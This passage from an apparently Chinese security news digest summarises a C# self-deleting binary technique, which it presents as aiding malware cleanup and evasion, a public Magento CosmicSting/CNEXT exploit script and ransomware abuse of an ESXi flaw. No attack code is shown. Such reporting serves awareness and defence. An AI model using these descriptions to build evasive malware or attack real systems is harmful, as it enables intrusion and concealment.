		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">网页提供了一个C#语言编写的自删除二进制文件的示例代码，这对于恶意软件的开发特别有用，因为在正常情况下，Windows系统不允许运行中的二进制文件被删除。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.6190019193857965" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1042" src="https://wechat2rss.xlab.app/img-proxy/?k=e5853ad8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnmMbSSOXzLLv374fC8mUZNB98RmO4V76oLAeLvncL14oDyBKY7Ol2PZDfXrZkNib70oicr5VHOCSUg%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnmMbSSOXzLLv374fC8mUZNOZnO6s87ic9ZLoKcia63RLiaeQ7GOXpLmuQpxcWatBxzCPUzUelia6X8Pg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnmMbSSOXzLLv374fC8mUZNOZnO6s87ic9ZLoKcia63RLiaeQ7GOXpLmuQpxcWatBxzCPUzUelia6X8Pg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855155484541551"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">自删除机制：网页提供的C#代码能够让运行中的程序自我删除，这在Windows系统中通常是不可能的。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">恶意软件应用：这种技术对于恶意软件来说具有特殊的用途，因为它可以帮助恶意软件在执行完毕后自我清理，减少被检测到的可能性。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">技术实现：代码通过调用Windows API，如<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">GetModuleFileName</code>、<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">CreateFileW</code>和<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">SetFileInformationByHandle</code>，实现了对二进制文件的默认数据流重命名和删除操作。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">项目需求：作者在开发SharpCovertTube项目时，出于项目需求，将原本用C语言编写的Maldev Academy课程代码进行了端口，以适应C#环境。</section></li></ul>
	<br/>
	<p>🏷️: C#, 自删除, 恶意软件, Windows</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x02
			 Cnext项目中的CosmicSting漏洞利用分析</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">网页提供了一个名为 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">cosmicsting-cnext-exploit.py</code> 的 GitHub 仓库中的 Python 文件，该文件是由 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">ambionics/cnext-exploits</code> 项目的最新提交中的一个部分。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.5" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=dd810753&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnmMbSSOXzLLv374fC8mUZNEMqjTQRmL7TP4SUQyCJM6DVoz92eAIJfGqH8iafAQM0KvciakrAA2TlQ%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Magento 漏洞利用公开：CosmicSting 和 CNEXT 导致远程代码执行</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Magento 漏洞利用工具发布：CosmicSting 和 CNEXT</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnmMbSSOXzLLv374fC8mUZNeJ3N7wyYGz8LvzMZBxpP0PGhicqjpIzCBFOrZpUkpRFqYwuutJqJv6Q/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnmMbSSOXzLLv374fC8mUZNeJ3N7wyYGz8LvzMZBxpP0PGhicqjpIzCBFOrZpUkpRFqYwuutJqJv6Q/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=8855155448451412"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">该 Python 脚本是针对 CosmicString CNEXT 的一个漏洞利用工具。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">脚本的最新提交包含了 557 行有效的 Python 代码，用于实现漏洞利用的功能。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">文件大小为 23.2 KB，这表明脚本可能包含了一些额外的功能或者是较为复杂的代码结构。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">页面上的错误消息可能指向了 GitHub 上的某种操作限制，比如在特定时间内无法提交更改或者执行其他操作。 请注意，由于提供的内容非常有限，以上信息仅基于该片段，可能不能全面反映整个网页的内容。</section></li></ul>
	<br/>
	<p>🏷️: 漏洞利用, GitHub, 代码分析</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x03
			 勒索软件操作者利用ESXi虚拟机管理程序漏洞进行大规模加密</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">微软研究人员发现ESXi虚拟机管理程序中存在的一个漏洞，被多个勒索软件运营商用于获取对域连接的ESXi虚拟机管理程序的完全管理权限，可能导致虚拟机的文件系统加密、数据窃取或网络内部横向移动。</span>
		</p>
	</blockquote>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">ESXi 域加入漏洞：黑客可获得 VMware ESX 全权限</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">AD域管理漏洞：ESX Admins组权限风险</section></li></ul>
	<section>
